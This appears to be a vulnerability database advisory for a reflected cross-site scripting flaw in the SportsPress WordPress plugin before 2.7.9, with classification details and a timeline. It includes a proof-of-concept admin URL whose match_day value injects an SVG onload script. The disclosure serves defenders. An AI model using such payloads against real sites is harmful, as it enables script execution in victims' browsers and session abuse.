WordPress Plugin Vulnerabilities
SportsPress < 2.7.9 - Reflected Cross-Site Scripting
Description
The plugin does not sanitise and escape its match_day parameter before outputting back in the Events backend page, leading to a Reflected Cross-Site Scripting issue
Proof of Concept
https://example.com/wp-admin/edit.php?post_type=sp_event&match_day=%22%3E%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3B%3E%3C%22
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
iohex
Submitter
iohex
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-11-16 (about 2 years ago)
Added
2021-11-16 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)